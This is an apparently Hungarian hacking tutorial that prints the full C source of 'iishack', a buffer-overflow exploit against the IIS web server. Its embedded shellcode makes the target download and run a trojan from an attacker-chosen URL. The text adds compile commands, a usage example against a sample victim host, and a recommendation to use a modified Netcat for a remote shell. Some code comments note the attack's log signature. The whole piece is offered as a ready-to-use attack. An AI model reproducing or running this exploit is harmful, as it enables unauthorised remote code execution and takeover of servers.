Bevezető
Biztos vagyok benne hogy már sokan találkoztatok olyan
oldallal, amin a fentebb említett webszerver pörgött ezerrel. Pontosabban nem is
webszerver, mert tudtommal van FTP és Gopher része is. Éppen a napokban találtam egy
windows alatt futtatható kicsi programot, amivel egy sebezhetőséget kihasználva fel tudsz
tölteni egy trójai programot. Itt szeretném megemlíteni, hogy van ugyebár linuxos .c
forrása is, én ezt használom, úgyhogy a cikk főleg erre fog épülni.
A Linuxos C forrás
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdlib.h>
#include <arpa/inet.h>
/* Number of bytes of egg[] that main() writes to the socket; the send loop
 * stops after exactly this many. A rough count of the initializer below
 * gives one value more than egglen (1158) -- TODO confirm; if so the last
 * byte is never transmitted. */
#define egglen 1157
/* Offset into egg[] at which main() patches in the caller-supplied URL.
 * The region from here on is pre-filled with 0x21 ('!') bytes. */
#define urloff 1055
/* Request buffer sent verbatim by main(). Read as ASCII it opens with
 * "GET /" (71 69 84 32 47), continues with a long run of 'A' (65) and ends
 * with ".htr HTTP/1.0\r\n\r\n" (46 104 116 114 ... 13 10 13 10). The bytes
 * in between are not annotated here.
 * Defender note: an oversized GET whose path is hundreds of 'A's ending in
 * ".htr" is the observable signature of this request in web logs and on
 * the wire; request-length limits and a WAF rule on that shape catch it. */
unsigned char egg[] = {
71, 69, 84, 32, 47, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65,
65, 65, 65, 176, 135, 103, 104, 176, 135, 103, 104, 144, 144, 144, 144, 88,
88, 144, 51, 192, 80, 91, 83, 89, 139, 222, 102, 184, 33, 2, 3, 216,
50, 192, 215, 44, 33, 136, 3, 75, 60, 222, 117, 244, 67, 67, 186, 208,
16, 103, 104, 82, 81, 83, 255, 18, 139, 240, 139, 249, 252, 89, 177, 6,
144, 90, 67, 50, 192, 215, 80, 88, 132, 192, 80, 88, 117, 244, 67, 82,
81, 83, 86, 178, 84, 255, 18, 171, 89, 90, 226, 230, 67, 50, 192, 215,
80, 88, 132, 192, 80, 88, 117, 244, 67, 82, 83, 255, 18, 139, 240, 90,
51, 201, 80, 88, 177, 5, 67, 50, 192, 215, 80, 88, 132, 192, 80, 88,
117, 244, 67, 82, 81, 83, 86, 178, 84, 255, 18, 171, 89, 90, 226, 230,
51, 192, 80, 64, 80, 64, 80, 255, 87, 244, 137, 71, 204, 51, 192, 80,
80, 176, 2, 102, 171, 88, 180, 80, 102, 171, 88, 171, 171, 171, 177, 33,
144, 102, 131, 195, 22, 139, 243, 67, 50, 192, 215, 58, 200, 117, 248, 50,
192, 136, 3, 86, 255, 87, 236, 144, 102, 131, 239, 16, 146, 139, 82, 12,
139, 18, 139, 18, 146, 139, 215, 137, 66, 4, 82, 106, 16, 82, 255, 119,
204, 255, 87, 248, 90, 102, 131, 238, 8, 86, 67, 139, 243, 252, 172, 132,
192, 117, 251, 65, 78, 199, 6, 141, 138, 141, 138, 129, 54, 128, 128, 128,
128, 51, 192, 80, 80, 106, 72, 83, 255, 119, 204, 255, 87, 240, 88, 91,
139, 208, 102, 184, 255, 15, 80, 82, 80, 82, 255, 87, 232, 139, 240, 88,
144, 144, 144, 144, 80, 83, 255, 87, 212, 139, 232, 51, 192, 90, 82, 80,
82, 86, 255, 119, 204, 255, 87, 236, 128, 252, 255, 116, 15, 80, 86, 85,
255, 87, 216, 128, 252, 255, 116, 4, 133, 192, 117, 223, 85, 255, 87, 220,
51, 192, 64, 80, 83, 255, 87, 228, 144, 144, 144, 144, 255, 108, 102, 115,
111, 102, 109, 84, 83, 33, 128, 141, 132, 147, 134, 130, 149, 33, 128, 141,
152, 147, 138, 149, 134, 33, 128, 141, 132, 141, 144, 148, 134, 33, 128, 141,
144, 145, 134, 143, 33, 120, 138, 143, 102, 153, 134, 132, 33, 104, 141, 144,
131, 130, 141, 98, 141, 141, 144, 132, 33, 120, 116, 112, 100, 108, 84, 83,
33, 147, 134, 132, 151, 33, 148, 134, 143, 133, 33, 148, 144, 132, 140, 134,
149, 33, 132, 144, 143, 143, 134, 132, 149, 33, 136, 134, 149, 137, 144, 148,
149, 131, 154, 143, 130, 142, 134, 33, 144, 152, 143, 79, 134, 153, 134, 33,
33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33,
33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33,
33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33,
33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33,
33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33,
33, 33, 33, 33, 33, 46, 104, 116, 114, 32, 72, 84, 84, 80, 47, 49,
46, 48, 13, 10, 13, 10, 10 };
/* Resolve a dotted-quad string or a hostname to a network-order IPv4 address.
 * Returns the address, or 0 (after printing an error with herror) when the
 * name lookup fails. A caller cannot tell that failure apart from the
 * address 0.0.0.0, and main() below does not check for it at all.
 * Note: memcpy is used although <string.h> is not included above. */
u_int32_t resolve(char *host)
{
struct hostent *he;
/* inet_addr returns INADDR_NONE (all ones) for non-numeric input. On targets
 * where long is wider than in_addr_t (LP64) that value is not equal to -1,
 * so the test below never falls through to gethostbyname and hostnames are
 * not actually resolved there -- TODO confirm on the platform in use. */
long n = inet_addr(host);
if(n!=-1)
return(n);
he = gethostbyname(host);
if(!he)
{
herror("gethostbyname");
return(0);
}
/* Copies 4 bytes into n, but n is never read again; the value returned is a
 * long-sized read through h_addr_list[0], which points at a 4-byte address
 * record. Only the truncation to u_int32_t on return makes that well-defined
 * in practice; reading sizeof(long) bytes from a 4-byte object is still
 * out of bounds on 64-bit hosts. */
memcpy(&n, he->h_addr, 4);
return(*(long *)he->h_addr_list[0]);
}
/* Entry point: usage is <server> <port> <trojan>. Patches the third argument
 * into egg[] at urloff, opens a TCP connection to server:port and writes the
 * first egglen bytes of egg[] to it. Exits with status 1 on a usage error,
 * an over-long third argument, or a failed send.
 * Note: strlen and atoi are used without <string.h>; socket(), connect() and
 * resolve() results are never checked, so a refused connection or a failed
 * lookup is only noticed indirectly when send() fails. */
int main(int argc, char **argv)
{
char *server;
int port;
char *url;
int fd;
struct sockaddr_in s_in;        /* never zeroed; only family/port/addr are set */
int i=0,x,j=0;
int first=0;
if(argc != 4)
{
fprintf(stderr, "usage: %s <server> <port> <trojan>\n",
argv[0]);
exit(1);
}
server = argv[1];
port = atoi(argv[2]);           /* no range or error checking on the port */
url = argv[3];
/* Bound on the patch: at most 85 input bytes plus the 6 bytes substituted for
 * the first '/' gives j <= 90, so urloff + j stays at or below 1145, inside
 * the egglen window. Lengthening this limit without re-checking that
 * arithmetic would write past the prepared region. */
if(strlen(url) > 85)
{
fprintf(stderr, "Trojan name must be less than 85 characters.\n");
exit(1);
}
/* x is int while strlen() is size_t: signed/unsigned comparison in the
 * condition, harmless here because the length is already bounded above. */
for(x=0;x<strlen(url);x++)
{
/* The first '/' in the argument is replaced by six bytes, each stored as
 * the character plus 0x21; every other byte is added onto the 0x21 filler
 * already present at that position (see egg[] above), i.e. the same
 * +0x21 encoding. Later '/' characters are copied like any other byte. */
if(url[x] == '/' && !first)
{
first=1;
egg[urloff+j]='!'+0x21;
egg[urloff+j+1]='G'+0x21;
egg[urloff+j+2]='E'+0x21;
egg[urloff+j+3]='T'+0x21;
egg[urloff+j+4]=' '+0x21;
egg[urloff+j+5]='/'+0x21;
j+=6;
continue;
}
egg[urloff+j] += url[x];
j++;
}
fd = socket(AF_INET, SOCK_STREAM, 0);          /* return value unchecked */
s_in.sin_family = AF_INET;
s_in.sin_port = htons(port);
s_in.sin_addr.s_addr = resolve(server);        /* 0 on lookup failure, unchecked */
connect(fd, (struct sockaddr *)&s_in, sizeof(struct sockaddr_in));  /* unchecked */
/* Partial-write loop: keeps sending until exactly egglen bytes are out.
 * Only a negative return aborts; a zero return would loop forever. */
while(i!=egglen)
{
x=send(fd, egg+i, egglen-i, 0);
if(x<0)
{
fprintf(stderr, "Connection to target lost. WTF?\n");
exit(1);
}
i+=x;
}
/* No response is read, so "success" here only means the bytes were sent. */
printf("Trojan uploaded successfully (I think...)\n");
return(0);
}
/* EuroHack Team [2000] http://hackers.hungary.nu */
Használati útmutató
A programnak, mint ahogy azt már fentebb említettem, van
linuxos és windowsos változata is. A linuxos egy .c forrás, amit feljebb láthattatok,
a dosos pedig egy .asm forrás. A linuxost a "cc -o iishack iishack.c"
paranccsal fordíthatjátok le, a windowsost pedig a "tasm32 -ml iishack.asm",
majd a "tlink32 -Tpe -c -x iishack.obj ,,, import32" parancsok
segítségével. Ha ez megtörtént, akkor az alábbi módon tudod feltölteni a trójai programot
az áldozat gépére:
./iishack <server> <port> <trojai>
Például:
./iishack www.aldozathostja.hu 80
www.encimemaholatrojaivan.com/exploit.exe
Ajánlat
Az ajánlott trojai progi a művelet végrehajtásához az
NCX.EXE vagy az NCX99.EXE legyen. Ez a Netcat módosított változata... Miután az iishack egy
veremtúlcsordulás után feljuttatta és elindította, a progi az iishack-nél
beállított portot megnyitja, és egy shellhez juttat a szerveren.
Ötlet:
http://ww.eEye.Com/
Letölthető források, programok:
- NCX.EXE
- NCX99.EXE
- IISHACK.C
- IISHACK.ASM